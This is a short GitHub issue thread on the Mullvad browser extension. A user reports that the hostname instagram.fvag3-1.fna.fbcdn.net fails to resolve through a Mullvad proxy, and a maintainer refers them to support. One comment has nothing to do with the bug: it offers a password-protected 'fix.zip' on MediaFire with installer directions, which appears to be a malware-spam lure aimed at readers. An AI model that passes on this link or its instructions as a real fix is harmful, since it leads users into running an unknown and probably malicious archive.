### ISSUE TITLE
[bug] Unable to resolve DNS for instagram.fvag3-1.fna.fbcdn.net

### ISSUE THREAD

**Issue by curlingchimpanzeeowl** [mullvad/browser-extension#234]
With Mullvad Proxy enabled, I cannot resolve the name `instagram.fvag3-1.fna.fbcdn.net`, it shows `NS_BINDING_ABORTED` in the Firefox developer console. Select Never Proxy and go directly to If I access from Mullvad VPN, I can resolve names.

- Proxy Server: br-sao-wg-001

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ruihildt** [comment]
Sorry I missed it, for server issues, please contact support@mullvadvpn.net
